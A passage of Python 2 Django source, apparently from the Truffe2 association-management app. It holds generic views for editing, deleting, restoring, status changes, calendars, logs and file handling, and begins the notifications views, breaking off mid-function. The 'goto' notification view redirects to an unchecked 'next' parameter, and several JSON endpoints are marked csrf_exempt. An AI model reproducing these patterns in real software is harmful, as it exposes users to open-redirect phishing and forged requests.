obj.save_signal()
if hasattr(obj, 'MetaEdit') and hasattr(obj.MetaEdit, 'do_extra_post_actions'):
extra_args = obj.MetaEdit.do_extra_post_actions(obj, request, request.POST, True)
for (lines, logs) in [(lines_adds, 'log_add'), (lines_updates, 'log_update'), (lines_deletes, 'log_delete')]:
lines.update(extra_args[logs])
messages.success(request, _(u'Élément sauvegardé !'))
if not before_data:
log_class(who=request.user, what='created', object=obj).save()
if hasattr(obj, 'create_signal'):
obj.create_signal(request)
else:
# Compute diff
after_data = obj.build_state()
for key in list(before_data)[::]: # Be sure we're on a copy
if key in after_data and after_data[key] == before_data[key]:
del after_data[key]
del before_data[key]
added = {}
edited = {}
deleted = {}
for key in before_data:
if key not in after_data:
deleted[key] = before_data[key]
else:
if not after_data[key]:
deleted[key] = before_data[key]
del after_data[key]
elif before_data[key]:
edited[key] = (before_data[key], after_data[key])
del after_data[key]
added = after_data
added.update(lines_adds)
edited.update(lines_updates)
deleted.update(lines_deletes)
if tag_mode and tags_before != tags_after:
edited['tags'] = (tags_before, tags_after)
diff = {'added': added, 'edited': edited, 'deleted': deleted}
log_class(who=request.user, what='edited', object=obj, extra_data=json.dumps(diff)).save()
obj.user_has_seen_object(request.user)
if request.POST.get('post-save-dest'):
if request.POST.get('post-save-dest') == 'new':
return redirect(module.__name__ + '.views.' + base_name + '_edit', pk='~')
else:
return redirect(module.__name__ + '.views.' + base_name + '_edit', pk=obj.pk)
return HttpResponseRedirect('%s%s' % (reverse(module.__name__ + '.views.' + base_name + '_show', args=(obj.pk,)), '?_upkns=_&_fromrelated=_' if related_mode else ''))
else:
if hasattr(obj, 'MetaEdit') and hasattr(obj.MetaEdit, 'do_extra_post_actions'):
extra_args = obj.MetaEdit.do_extra_post_actions(obj, request, request.POST, False)
else:
form = form_class(request.user, instance=obj)
if file_mode:
# Generate a new file session
file_key = <KEY>
request.session['pca_files_%s' % (file_key,)] = [f.pk for f in obj.files.all()] if obj.pk else []
# Init subforms
for line_data in lines_objects:
if obj.pk:
line_objs = getattr(obj, line_data['related_name'])
if line_data['sortable']:
line_objs = line_objs.order_by('order')
else:
line_objs = line_objs.order_by('pk')
for line_obj in line_objs:
line_form = line_data['form'](instance=line_obj, prefix="_LINES_%s_%s" % (line_data['related_name'], line_obj.pk))
line_form_data = {'id': line_obj.pk, 'form': line_form}
line_data['forms'].append(line_form_data)
if tag_mode:
tags = [t.tag for t in obj.tags.all()] if obj.pk else []
if file_mode:
if 'pca_files_%s' % (file_key,) in request.session:
files = [file_class.objects.get(pk=pk_) for pk_ in request.session['pca_files_%s' % (file_key,)]]
else:
files = None
messages.warning(request, _(u'Erreur lors de la récupération de la session pour la gestion des fichiers. Il est possible que le formulaire aie été sauvegardé deux fois. Vérifiez si l\'état actuel des fichiers correspond à ce que vous désirez !'))
else:
files = None
costcenter_mode = isinstance(obj, CostCenterLinked)
data = {'Model': model_class, 'form': form, 'list_view': list_view, 'show_view': show_view, 'unit_mode': unit_mode, 'current_unit': current_unit,
'main_unit': main_unit, 'unit_blank': unit_blank, 'year_mode': year_mode, 'current_year': current_year,
'years_available': AccountingYear.build_year_menu('EDIT' if obj.pk else 'CREATE', request.user), 'related_mode': related_mode, 'list_related_view': list_related_view,
'file_mode': file_mode, 'file_upload_view': file_upload_view, 'file_delete_view': file_delete_view, 'files': files, 'file_key': file_key, 'file_get_view': file_get_view,
'file_get_thumbnail_view': file_get_thumbnail_view, 'lines_objects': lines_objects, 'costcenter_mode': costcenter_mode, 'tag_mode': tag_mode, 'tags': tags,
'tag_search_view': tag_search_view, 'extra_args': extra_args.get('display', '')}
if hasattr(model_class.MetaData, 'extra_args_for_edit'):
data.update(model_class.MetaData.extra_args_for_edit(request, current_unit, current_year))
return render(request, ['%s/%s/edit.html' % (module.__name__, base_name), 'generic/generic/edit.html'], data)
return _generic_edit
def generate_show(module, base_name, model_class, log_class, tag_class):
@login_required
def _generic_show(request, pk):
edit_view = '%s.views.%s_edit' % (module.__name__, base_name)
delete_view = '%s.views.%s_delete' % (module.__name__, base_name)
log_view = '%s.views.%s_log' % (module.__name__, base_name)
list_view = '%s.views.%s_list' % (module.__name__, base_name)
list_related_view = '%s.views.%s_list_related' % (module.__name__, base_name)
status_view = '%s.views.%s_switch_status' % (module.__name__, base_name)
contact_view = '%s.views.%s_contact' % (module.__name__, base_name)
file_get_view = '%s.views.%s_file_get' % (module.__name__, base_name)
file_get_thumbnail_view = '%s.views.%s_file_get_thumbnail' % (module.__name__, base_name)
related_mode = request.GET.get('_fromrelated') == '_'
obj = get_object_or_404(model_class, pk=pk)
year_mode, current_year, AccountingYear = get_year_data(model_class, request)
unit_mode, current_unit, unit_blank = get_unit_data(model_class, request)
if unit_mode:
unit = obj.costcenter.unit if isinstance(obj, CostCenterLinked) else obj.unit
update_current_unit(request, unit.pk if unit else -1)
current_unit = unit
if year_mode:
update_current_year(request, obj.accounting_year.pk)
current_year = obj.accounting_year
if isinstance(obj, BasicRightModel) and not obj.rights_can('SHOW', request.user):
raise Http404
if obj.deleted:
return render(request, ['%s/%s/show_deleted.html' % (module.__name__, base_name), 'generic/generic/show_deleted.html'], {
'Model': model_class, 'delete_view': delete_view, 'edit_view': edit_view, 'log_view': log_view, 'list_view': list_view, 'status_view': status_view, 'contact_view': contact_view, 'list_related_view': list_related_view, 'file_get_view': file_get_view, 'file_get_thumbnail_view': file_get_thumbnail_view,
'obj': obj,
})
rights = []
if hasattr(model_class, 'MetaRights'):
for key, info in obj.MetaRights.rights.iteritems():
rights.append((key, info, obj.rights_can(key, request.user)))
log_entires = log_class.objects.filter(object=obj).order_by('-when').all()
if hasattr(obj, 'contactables_groups'):
contactables_groups = obj.contactables_groups()
else:
contactables_groups = None
lines_objects = []
from generic.models import GenericModelWithLines
if issubclass(model_class, GenericModelWithLines):
lines_objects = copy.deepcopy(obj.MetaLines.lines_objects)
for line_data in lines_objects:
line_objs = getattr(obj, line_data['related_name'])
if line_data['sortable']:
line_objs = line_objs.order_by('order')
else:
line_objs = line_objs.order_by('pk')
line_data['elems'] = line_objs
tags = []
if tag_class:
tags = [t.tag for t in obj.tags.order_by('tag')]
obj.user_has_seen_object(request.user)
return render(request, ['%s/%s/show.html' % (module.__name__, base_name), 'generic/generic/show.html'], {
'Model': model_class, 'delete_view': delete_view, 'edit_view': edit_view, 'log_view': log_view, 'list_view': list_view, 'status_view': status_view, 'contact_view': contact_view, 'list_related_view': list_related_view, 'file_get_view': file_get_view, 'file_get_thumbnail_view': file_get_thumbnail_view,
'obj': obj, 'log_entires': log_entires,
'rights': rights,
'unit_mode': unit_mode, 'current_unit': current_unit,
'year_mode': year_mode, 'current_year': current_year,
'contactables_groups': contactables_groups,
'related_mode': related_mode, 'lines_objects': lines_objects,
'tags': tags,
})
return _generic_show
def generate_delete(module, base_name, model_class, log_class):
@login_required
def _generic_delete(request, pk):
list_view = '%s.views.%s_list' % (module.__name__, base_name)
list_related_view = '%s.views.%s_list_related' % (module.__name__, base_name)
show_view = '%s.views.%s_show' % (module.__name__, base_name)
related_mode = request.GET.get('_fromrelated') == '_'
objs = [get_object_or_404(model_class, pk=pk_, deleted=False) for pk_ in filter(lambda x: x, pk.split(','))]
multi_obj = len(objs) > 1
for obj in objs:
unit_mode, current_unit, unit_blank = get_unit_data(model_class, request)
year_mode, current_year, AccountingYear = get_year_data(model_class, request)
if unit_mode:
if isinstance(obj, CostCenterLinked):
update_current_unit(request, obj.costcenter.unit.pk if obj.costcenter.unit else -1)
else:
update_current_unit(request, obj.unit.pk if obj.unit else -1)
if year_mode:
update_current_year(request, obj.accounting_year.pk)
if isinstance(obj, BasicRightModel) and not obj.rights_can('DELETE', request.user):
raise Http404
can_delete = True
can_delete_message = ''
prob_obj = None
for obj in objs:
if hasattr(obj, 'can_delete'):
(can_delete, can_delete_message) = obj.can_delete()
if not can_delete:
prob_obj = obj
if can_delete and request.method == 'POST' and request.POST.get('do') == 'it':
for obj in objs:
obj.deleted = True
if hasattr(obj, 'delete_signal'):
obj.delete_signal(request)
obj.save()
log_class(who=request.user, what='deleted', object=obj).save()
messages.success(request, _(u'Élément supprimé !'))
if related_mode:
return redirect(list_related_view)
else:
return redirect(list_view)
return render(request, ['%s/%s/delete.html' % (module.__name__, base_name), 'generic/generic/delete.html'], {
'Model': model_class, 'show_view': show_view, 'list_view': list_view, 'list_related_view': list_related_view,
'objs': objs, 'can_delete': can_delete, 'can_delete_message': can_delete_message,
'related_mode': related_mode, 'multi_obj': multi_obj, 'prob_obj': prob_obj
})
return _generic_delete
def generate_deleted(module, base_name, model_class, log_class):
@login_required
def _generic_deleted(request):
list_view = '%s.views.%s_list' % (module.__name__, base_name)
year_mode, current_year, AccountingYear = get_year_data(model_class, request)
unit_mode, current_unit, unit_blank = get_unit_data(model_class, request)
if hasattr(model_class, 'static_rights_can') and not model_class.static_rights_can('RESTORE', request.user, current_unit, current_year):
raise Http404
if unit_mode:
from units.models import Unit
main_unit = Unit.objects.get(pk=settings.ROOT_UNIT_PK)
main_unit.set_rights_can_select(lambda unit: model_class.static_rights_can('RESTORE', request.user, unit, current_year))
main_unit.set_rights_can_edit(lambda unit: model_class.static_rights_can('RESTORE', request.user, unit, current_year))
main_unit.check_if_can_use_hidden(request.user)
else:
main_unit = None
if request.method == 'POST':
obj = get_object_or_404(model_class, pk=request.POST.get('pk'), deleted=True)
if unit_mode:
if isinstance(obj, CostCenterLinked):
update_current_unit(request, obj.costcenter.unit.pk if obj.costcenter.unit else -1)
else:
update_current_unit(request, obj.unit.pk if obj.unit else -1)
if year_mode:
update_current_year(request, obj.accounting_year.pk)
if isinstance(obj, BasicRightModel) and not obj.rights_can('RESTORE', request.user):
raise Http404
obj.deleted = False
if hasattr(obj, 'restore_signal'):
obj.restore_signal()
obj.save()
log_class(who=request.user, what='restored', object=obj).save()
messages.success(request, _(u'Élément restauré !'))
return redirect(list_view)
liste = model_class.objects.filter(deleted=True).annotate(Max('logs__when')).order_by('-logs__when__max')
if unit_mode:
if isinstance(model_class(), CostCenterLinked):
liste = liste.filter(costcenter__unit=current_unit)
else:
liste = liste.filter(unit=current_unit)
if year_mode:
liste = liste.filter(accounting_year=current_year)
else:
liste = liste.all()
return render(request, ['%s/%s/deleted.html' % (module.__name__, base_name), 'generic/generic/deleted.html'], {
'Model': model_class, 'list_view': list_view, 'liste': liste,
'unit_mode': unit_mode, 'current_unit': current_unit, 'main_unit': main_unit, 'unit_blank': unit_blank,
'year_mode': year_mode, 'current_year': current_year, 'years_available': AccountingYear.build_year_menu('RESTORE', request.user),
})
return _generic_deleted
def generate_switch_status(module, base_name, model_class, log_class):
@login_required
def _switch_status(request, pk):
objs = [get_object_or_404(model_class, pk=pk_, deleted=False) for pk_ in filter(lambda x: x, pk.split(','))]
multi_obj = len(objs) > 1
unit_mode, current_unit, unit_blank = get_unit_data(model_class, request)
# Don't switch when switching status
# if unit_mode:
# update_current_unit(request, obj.unit.pk if obj.unit else -1)
can_switch = True
can_switch_message = ''
done = False
prob_obj = None
no_more_access = False
list_view = '%s.views.%s_list' % (module.__name__, base_name)
status_view = '%s.views.%s_switch_status' % (module.__name__, base_name)
dest_status = request.GET.get('dest_status')
from_list = request.GET.get('from_list') == 'from_list'
for obj in objs:
if not hasattr(obj, 'MetaState') or dest_status not in obj.MetaState.states:
raise Http404
(can_switch, can_switch_message) = obj.can_switch_to(request.user, dest_status)
if not can_switch:
prob_obj = obj
bonus_form = None
if hasattr(model_class.MetaState, 'states_bonus_form'):
bonus_form = model_class.MetaState.states_bonus_form.get((obj.status, dest_status), model_class.MetaState.states_bonus_form.get(dest_status, None))
if bonus_form and hasattr(bonus_form, '__call__') and not inspect.isclass(bonus_form):
bonus_form = bonus_form(request, obj)
if can_switch and request.method == 'POST' and request.POST.get('do') == 'it':
for obj in objs:
old_status = obj.status
obj.status = dest_status
obj.user_has_seen_object(request.user)
obj.save()
if isinstance(obj, BasicRightModel):
obj.rights_expire()
if hasattr(obj, 'switch_status_signal'):
obj.switch_status_signal(request, old_status, dest_status)
log_class(who=request.user, what='state_changed', object=obj, extra_data=json.dumps({'old': unicode(obj.MetaState.states.get(old_status)), 'new': unicode(obj.MetaState.states.get(dest_status))})).save()
storage = messages.get_messages(request)
if not storage:
messages.success(request, _(u'Statut modifié !'))
storage.used = False
done = True
no_more_access = not obj.rights_can('SHOW', request.user)
if no_more_access:
messages.warning(request, _(u'Vous avez perdu le droit de voir l\'objet !'))
obj.user_has_seen_object(request.user)
return render(request, ['%s/%s/switch_status.html' % (module.__name__, base_name), 'generic/generic/switch_status.html'], {
'Model': model_class, 'objs': objs, 'can_switch': can_switch, 'can_switch_message': can_switch_message, 'done': done, 'no_more_access': no_more_access,
'dest_status': dest_status, 'dest_status_message': objs[0].MetaState.states.get(dest_status),
'status_view': status_view, 'list_view': list_view,
'bonus_form': bonus_form() if bonus_form else None,
'from_list': from_list, 'multi_obj': multi_obj, 'prob_obj': prob_obj, 'pk': pk,
})
return _switch_status
def generate_contact(module, base_name, model_class, log_class):
@login_required
def _contact(request, pk, key):
contact_view = '%s.views.%s_contact' % (module.__name__, base_name)
show_view = '%s.views.%s_show' % (module.__name__, base_name)
obj = get_object_or_404(model_class, pk=pk, deleted=False)
unit_mode, current_unit, unit_blank = get_unit_data(model_class, request)
year_mode, current_year, AccountingYear = get_year_data(model_class, request)
if unit_mode:
if isinstance(obj, CostCenterLinked):
update_current_unit(request, obj.costcenter.unit.pk if obj.costcenter.unit else -1)
else:
update_current_unit(request, obj.unit.pk if obj.unit else -1)
if year_mode:
update_current_year(request, obj.accounting_year.pk)
if isinstance(obj, BasicRightModel) and not obj.rights_can('SHOW', request.user):
raise Http404
if not hasattr(obj, 'contactables_groups'):
raise Http404
contactables_groups = obj.contactables_groups()
done = False
if request.method == 'POST':
form = ContactForm(contactables_groups, request.POST)
if form.is_valid():
dest = [u.email for u in getattr(obj, 'build_group_members_for_%s' % (form.cleaned_data['key'],))()]
context = {
'subject': form.cleaned_data['subject'],
'show_view': show_view,
'message': form.cleaned_data['message'],
'sender': request.user,
'obj': obj
}
send_templated_mail(request, _('Truffe :: Contact :: %s') % (form.cleaned_data['subject'],), request.user.email, dest, 'generic/generic/mail/contact', context)
if form.cleaned_data['receive_copy']:
send_templated_mail(request, _('Truffe :: Contact :: %s') % (form.cleaned_data['subject'],), request.user.email, [request.user.email], 'generic/generic/mail/contact', context)
done = True
messages.success(request, _(u'Message envoyé !'))
else:
form = ContactForm(contactables_groups, initial={'key': key})
return render(request, ['%s/%s/contact.html' % (module.__name__, base_name), 'generic/generic/contact.html'], {
'Model': model_class, 'obj': obj, 'contact_view': contact_view, 'form': form, 'done': done
})
return _contact
def check_unit_name(request):
from units.models import Unit
return HttpResponse(json.dumps({'result': 'ok' if Unit.objects.filter(name__icontains=request.GET.get('name')).count() == 0 else 'err'}))
def generate_calendar(module, base_name, model_class):
return generate_generic_list(module, base_name, model_class, '_calendar_json', 'LIST', 'CREATE', 'calendar', True)
def generate_calendar_json(module, base_name, model_class):
@login_required
@csrf_exempt
def _generic_calendar_json(request):
unit_mode, current_unit, unit_blank = get_unit_data(model_class, request)
year_mode, current_year, AccountingYear = get_year_data(model_class, request)
if unit_mode:
if not current_unit:
if request.user.is_superuser: # Never filter
filter_ = lambda x: x.filter(unit=None)
else:
filter_ = lambda x: x.filter(unit=None, unit_blank_user=request.user)
else:
filter_ = lambda x: x.filter(unit=current_unit)
else:
filter_ = lambda x: x
if year_mode:
filter__ = lambda x: filter_(x).filter(accounting_year=current_year)
else:
filter__ = filter_
if hasattr(model_class, 'static_rights_can') and not model_class.static_rights_can('LIST', request.user, current_unit, current_year):
raise Http404
start = request.GET.get('start')
end = request.GET.get('end')
start = pytz.timezone(settings.TIME_ZONE).localize(datetime.datetime.fromtimestamp(float(start)))
end = pytz.timezone(settings.TIME_ZONE).localize(datetime.datetime.fromtimestamp(float(end)))
liste = filter__(model_class.objects.exclude((Q(start_date__lt=start) & Q(end_date__lt=start)) | (Q(start_date__gt=end) & Q(end_date__gt=end))).filter(Q(status='1_asking') | Q(status='2_online')))
retour = []
for l in liste:
if l.status == '1_asking':
icon = 'fa-question'
className = ["event", "bg-color-redLight"]
else:
icon = 'fa-check'
className = ["event", "bg-color-greenLight"]
if l.rights_can('SHOW', request.user):
url = l.display_url()
else:
url = ''
if hasattr(l, 'get_linked_object'):
linked_object = l.get_linked_object()
if isinstance(linked_object, list):
titre = u'{} (Géré par {})'.format(u', '.join([o.__unicode__() for o in linked_object]), linked_object[0].unit)
else:
titre = u'{} (Géré par {})'.format(l.get_linked_object(), l.get_linked_object().unit)
else:
titre = u'{}'.format(l)
retour.append({'title': titre, 'start': str(l.start_date), 'end': str(l.end_date), 'className': className, 'icon': icon, 'url': url, 'allDay': False, 'description': str(l)})
return HttpResponse(json.dumps(retour))
return _generic_calendar_json
def generate_calendar_related(module, base_name, model_class):
return generate_generic_list(module, base_name, model_class, '_calendar_related_json', 'VALIDATE', 'VALIDATE', 'calendar_related', False, True)
def generate_calendar_related_json(module, base_name, model_class):
@login_required
@csrf_exempt
def _generic_calendar_related_json(request):
unit_mode, current_unit, unit_blank = get_unit_data(model_class, request, allow_blank=False)
year_mode, current_year, AccountingYear = get_year_data(model_class, request)
if unit_mode and model_class.MetaState.unit_field != '!root':
if hasattr(model_class.MetaState, 'filter_unit_field'):
filter_ = lambda x: x.filter(**{model_class.MetaState.filter_unit_field.replace('.', '__'): current_unit})
else:
filter_ = lambda x: x.filter(**{model_class.MetaState.unit_field.replace('.', '__'): current_unit})
else:
filter_ = lambda x: x
if year_mode:
filter__ = lambda x: filter_(x).filter(accounting_year=current_year)
else:
filter__ = filter_
if request.GET.get('filter_object'):
if hasattr(model_class.MetaState, 'filter_unit_field'):
filter___ = lambda x: x.filter(**{'__'.join(model_class.MetaState.filter_unit_field.split('.')[:-1] + ['pk']): request.GET.get('filter_object'), model_class.MetaState.filter_unit_field.replace('.', '__'): current_unit})
else:
filter___ = lambda x: x.filter(**{'__'.join(model_class.MetaState.unit_field.split('.')[:-1] + ['pk']): request.GET.get('filter_object'), model_class.MetaState.unit_field.replace('.', '__'): current_unit})
else:
filter___ = lambda x: x
if hasattr(model_class, 'static_rights_can') and not model_class.static_rights_can('VALIDATE', request.user, current_unit, current_year):
raise Http404
start = request.GET.get('start')
end = request.GET.get('end')
start = pytz.timezone(settings.TIME_ZONE).localize(datetime.datetime.fromtimestamp(float(start)))
end = pytz.timezone(settings.TIME_ZONE).localize(datetime.datetime.fromtimestamp(float(end)))
liste = filter___(filter__(model_class.objects.exclude((Q(start_date__lt=start) & Q(end_date__lt=start)) | (Q(start_date__gt=end) & Q(end_date__gt=end))).filter(Q(status='1_asking') | Q(status='2_online')))).exclude(deleted=True).distinct()
retour = []
colors = ['default', 'danger', 'success', 'warning', 'info', 'primary']
for l in liste:
if l.unit:
par = l.unit.name
else:
par = u'%s (%s)' % (l.unit_blank_name, l.unit_blank_user)
if l.status == '1_asking':
icon = 'fa-question'
className = ["event", "bg-color-redLight"]
else:
icon = 'fa-check'
className = ["event", "bg-color-greenLight"]
if l.rights_can('SHOW', request.user):
url = l.display_url()
else:
url = ''
if hasattr(l, 'get_linked_object'):
lobj = l.get_linked_object()
if isinstance(lobj, list):
titre = u'{} (Réservé par {})'.format(u', '.join([o.__unicode__() for o in lobj]), par)
colored = colors[lobj[0].pk % len(colors)]
else:
titre = u'{} (Réservé par {})'.format(lobj, par)
colored = colors[lobj.pk % len(colors)]
else:
titre = u'{} (Réservé par {})'.format(l, par)
colored = ""
retour.append({'title': titre, 'start': str(l.start_date), 'end': str(l.end_date), 'className': className, 'icon': icon, 'url': url, 'allDay': False, 'description': str(l), 'colored': colored})
return HttpResponse(json.dumps(retour))
return _generic_calendar_related_json
def generate_calendar_specific(module, base_name, model_class):
def _check_and_add_context(request, pk):
base_model = model_class.get_linked_object_class()
cobject = get_object_or_404(base_model, pk=pk, deleted=False, allow_calendar=True)
if not cobject.allow_externals and request.user.is_external():
raise Http404()
if not cobject.allow_external_calendar and request.user.is_external():
raise Http404()
return {'cobject': cobject}
return generate_generic_list(module, base_name, model_class, '_calendar_specific_json', 'SHOW', 'SHOW', 'calendar_specific', False, bonus_args_transformator=_check_and_add_context)
def generate_calendar_specific_json(module, base_name, model_class):
@login_required
@csrf_exempt
def _generic_calendar_specific_json(request, pk):
unit_mode, current_unit, unit_blank = get_unit_data(model_class, request, allow_blank=False)
base_model = model_class.get_linked_object_class()
cobject = get_object_or_404(base_model, pk=pk, deleted=False, allow_calendar=True)
if not cobject.allow_externals and request.user.is_external():
raise Http404()
if not cobject.allow_external_calendar and request.user.is_external():
raise Http404()
filter_ = lambda x: x.filter(**{'__'.join(model_class.MetaState.unit_field.split('.')[:-1] + ['pk']): cobject.pk})
start = request.GET.get('start')
end = request.GET.get('end')
start = pytz.timezone(settings.TIME_ZONE).localize(datetime.datetime.fromtimestamp(float(start)))
end = pytz.timezone(settings.TIME_ZONE).localize(datetime.datetime.fromtimestamp(float(end)))
liste = filter_(model_class.objects.exclude((Q(start_date__lt=start) & Q(end_date__lt=start)) | (Q(start_date__gt=end) & Q(end_date__gt=end))).filter(Q(status='1_asking') | Q(status='2_online'))).exclude(deleted=True)
retour = []
for l in liste:
if l.unit:
par = l.unit.name
else:
par = u'%s (%s)' % (l.unit_blank_name, l.unit_blank_user)
if l.status == '1_asking':
icon = 'fa-question'
className = ["event", "bg-color-redLight"]
else:
icon = 'fa-check'
className = ["event", "bg-color-greenLight"]
if l.rights_can('SHOW', request.user):
url = l.display_url()
else:
url = ''
titre = par
retour.append({'title': titre, 'start': str(l.start_date), 'end': str(l.end_date), 'className': className, 'icon': icon, 'url': url, 'allDay': False, 'description': str(l)})
return HttpResponse(json.dumps(retour))
return _generic_calendar_specific_json
def generate_directory(module, base_name, model_class):
@login_required
def _generic_directory(request):
if not model_class.static_rights_can('CREATE', request.user):
raise Http404
from units.models import Unit
edit_view = '%s.views.%s_edit' % (module.__name__, base_name)
calendar_specific_view = '%s.views.%s_calendar_specific' % (module.__name__, base_name)
units = model_class.get_linked_object_class().objects.order_by('unit__name').filter(deleted=False)
if request.user.is_external():
units = units.filter(allow_externals=True)
units = [Unit.objects.get(pk=u['unit']) for u in units.values('unit').distinct()]
for unit in units:
unit.directory_objects = model_class.get_linked_object_class().objects.filter(unit=unit, deleted=False).order_by('title')
if request.user.is_external():
unit.directory_objects = unit.directory_objects.filter(allow_externals=True)
return render(request, ['%s/%s/directory.html' % (module.__name__, base_name), 'generic/generic/directory.html'], {
'Model': model_class, 'edit_view': edit_view, 'calendar_specific_view': calendar_specific_view,
'units': units,
})
return _generic_directory
def generate_logs(module, base_name, model_class):
@login_required
def _generic_logs(request):
# Le check des droits éventuelles est ultra complexe: il faut affichier
# les logs seulement des objets sur les quels l'users à le droit
# 'DISPLAY_LOG', hors c'est pas checkable via la base et il faut
# paginer. Le faire manuellement serait horible au niveau performances
# (par exemple en listant d'abord tous les objets puit en filtrant les
# logs via la liste d'objects possibles).
if not request.user.is_superuser:
raise Http404
logs_json_view = '%s.views.%s_logs_json' % (module.__name__, base_name)
list_view = '%s.views.%s_list' % (module.__name__, base_name)
data = {
'Model': model_class, 'logs_json_view': logs_json_view, 'list_view': list_view,
}
return render(request, ['%s/%s/logs.html' % (module.__name__, base_name), 'generic/generic/logs.html'], data)
return _generic_logs
def generate_logs_json(module, base_name, model_class, logging_class):
@login_required
@csrf_exempt
def _generic_logs_json(request):
if not request.user.is_superuser:
raise Http404
show_view = '%s.views.%s_show' % (module.__name__, base_name)
list_view = '%s.views.%s_list' % (module.__name__, base_name)
bonus_filter = []
for potential_str in ['title', 'name']:
if hasattr(model_class, potential_str):
bonus_filter += [potential_str]
return generic_list_json(request, logging_class, ['object', 'unit', 'when', 'who', 'what', 'pk'], [module.__name__ + '/' + base_name + '/logs_json.html', 'generic/generic/logs_json.html'],
{'Model': model_class,
'list_view': list_view,
'show_view': show_view,
},
not_sortable_columns=['unit',],
filter_fields=['when', 'who__first_name', 'what'] + bonus_filter,
)
return _generic_logs_json
def generate_file_upload(module, base_name, model_class, log_class, file_class):
@login_required
def _generic_file_upload(request):
file_delete_view = '%s.views.%s_file_delete' % (module.__name__, base_name)
file_get_view = '%s.views.%s_file_get' % (module.__name__, base_name)
file_get_thumbnail_view = '%s.views.%s_file_get_thumbnail' % (module.__name__, base_name)
key = request.GET.get('key')
file = upload_receive(request)
instance = file_class(file=file, uploader=request.user)
instance.save()
basename = os.path.basename(instance.file.path)
file_dict = {
'name': basename,
'size': file.size,
'url': reverse(file_get_view, kwargs={'pk': instance.pk}),
'thumbnailUrl': reverse(file_get_thumbnail_view, kwargs={'pk': instance.pk}),
'deleteUrl': '%s?key=%s' % (reverse(file_delete_view, kwargs={'pk': instance.pk}), key),
'deleteType': 'POST',
}
# Can't do it in one line !
try:
file_list = request.session['pca_files_%s' % (key,)]
except KeyError:
return HttpResponseNotFound()
file_list.append(instance.pk)
request.session['pca_files_%s' % (key,)] = file_list
return UploadResponse(request, file_dict)
return _generic_file_upload
def generate_file_delete(module, base_name, model_class, log_class, file_class):
@login_required
def _generic_file_delete(request, pk):
success = True
key = request.GET.get('key')
if int(pk) not in request.session['pca_files_%s' % (key,)]:
raise Http404()
try:
instance = file_class.objects.get(pk=pk)
if not instance.object: # Deleted later if linked
os.unlink(instance.file.path)
instance.delete()
file_list = request.session['pca_files_%s' % (key,)]
file_list.remove(int(pk))
request.session['pca_files_%s' % (key,)] = file_list
except file_class.DoesNotExist:
success = False
return JFUResponse(request, success)
return _generic_file_delete
def generate_file_get(module, base_name, model_class, log_class, file_class):
@login_required
def _generic_file_get(request, pk):
instance = get_object_or_404(file_class, pk=pk)
if not instance.object: # Just uploaded
if instance.uploader != request.user:
raise Http404
else:
if isinstance(instance.object, BasicRightModel) and not instance.object.rights_can('SHOW', request.user):
raise Http404
return sendfile(request, instance.file.path, 'down' in request.GET)
return _generic_file_get
def generate_file_get_thumbnail(module, base_name, model_class, log_class, file_class):
@login_required
def _generic_file_thumbnail(request, pk):
instance = get_object_or_404(file_class, pk=pk)
if not instance.object: # Just uploaded
if instance.uploader != request.user:
raise Http404
else:
if isinstance(instance.object, BasicRightModel) and not instance.object.rights_can('SHOW', request.user):
raise Http404
remove_me = None
if instance.is_picture():
url = instance.file
elif instance.is_pdf():
try:
url = os.path.join('cache', 'pdfthumbnail', "{}.jpg".format(instance.file.name.replace('/', '_')))
full_url = os.path.join(settings.MEDIA_ROOT, url)
if not os.path.isfile(full_url):
with Image(filename="{}{}[0]".format(settings.MEDIA_ROOT, instance.file)) as img:
img.save(filename=full_url)
except:
url = 'img/PDF.png'
else:
url = 'img/File.png'
options = {'size': (int(request.GET.get('w', 200)), int(request.GET.get('h', 100))), 'crop': True, 'upscale': True}
thumb = get_thumbnailer(url).get_thumbnail(options)
if remove_me:
os.unlink(remove_me)
return sendfile(request, '%s%s' % (settings.MEDIA_ROOT, thumb,))
return _generic_file_thumbnail
def generate_tag_search(module, base_name, model_class, log_class, tag_class):
@login_required
def _generic_tag_search(request):
upk = request.GET.get('upk')
if upk:
from units.models import Unit
unit = get_object_or_404(Unit, pk=upk)
else:
unit = None
ypk = request.GET.get('ypk')
if ypk:
from accounting_core.models import AccountingYear
year = get_object_or_404(AccountingYear, pk=ypk)
else:
year = None
q = request.GET.get('q')
tags = tag_class.objects
if q:
tags = tags.filter(tag__istartswith=q)
if unit:
if isinstance(model_class(), CostCenterLinked):
tags = tags.filter(object__costcenter__unit=unit)
else:
tags = tags.filter(object__unit=unit)
if year:
tags = tags.filter(object__accounting_year=year)
retour = []
for t in tags.order_by('tag'):
if t.tag not in retour:
retour.append(t.tag)
retour = [{'id': tag, 'text': tag} for tag in retour]
return HttpResponse(json.dumps(retour), content_type='text/json')
return _generic_tag_search
def generate_mayi(module, base_name, model_class, logging_class):
@login_required
@csrf_exempt
def _generic_mayi(request):
year_mode, current_year, AccountingYear = get_year_data(model_class, request)
unit_mode, current_unit, unit_blank = get_unit_data(model_class, request)
retour = {}
for r in ['RESTORE', 'CREATE']:
retour[r] = model_class.static_rights_can(r, request.user, current_unit, current_year)
return HttpResponse(json.dumps(retour), content_type='text/json')
return _generic_mayi
```
#### File: truffe2/notifications/views.py
```python
from django.shortcuts import get_object_or_404, render
from django.views.decorators.csrf import csrf_exempt
from django.http import HttpResponse
from django.contrib.auth.decorators import login_required
from django.http import HttpResponseRedirect
from django.utils.timezone import now
from notifications.models import Notification, NotificationRestriction
from generic.datatables import generic_list_json
@login_required
def dropdown(request):
"""Display the downdown menu for notificatoins"""
if request.GET.get('read'):
notification = get_object_or_404(Notification, pk=request.GET.get('read'), user=request.user)
notification.seen = True
notification.seen_date = now()
notification.save()
if request.GET.get('allread'):
Notification.objects.filter(user=request.user, seen=False).update(seen=True, seen_date=now())
pass
notifications = Notification.objects.filter(user=request.user, seen=False).order_by('-creation_date')
return render(request, 'notifications/dropdown.html', {'notifications': notifications})
@login_required
def goto(request, pk):
notification = get_object_or_404(Notification, pk=pk, user=request.user)
notification.seen = True
notification.seen_date = now()
notification.save()
return HttpResponseRedirect(request.GET.get('next'))
@login_required
def notifications_count(request):
if request.user.pk:
notifications = Notification.objects.filter(user=request.user, seen=False)
return {'notifications_count': notifications.count()}
else:
return {'notifications_count': 0}
@login_required
def notification_center(request):
"""Base display for the notification center"""
return render(request, 'notifications/center/index.html', {})
@login_required
def notification_keys(request):
"""Display left type menu"""
keys = []
for key in Notification.objects.filter(user=request.user).values('key').distinct():
key['nb_unread'] = Notification.objects.filter(user=request.user, seen=False, key=key['key']).count()
keys.append(key)
keys = sorted(keys, key=lambda x: x['key'])
regrouped_keys = {}
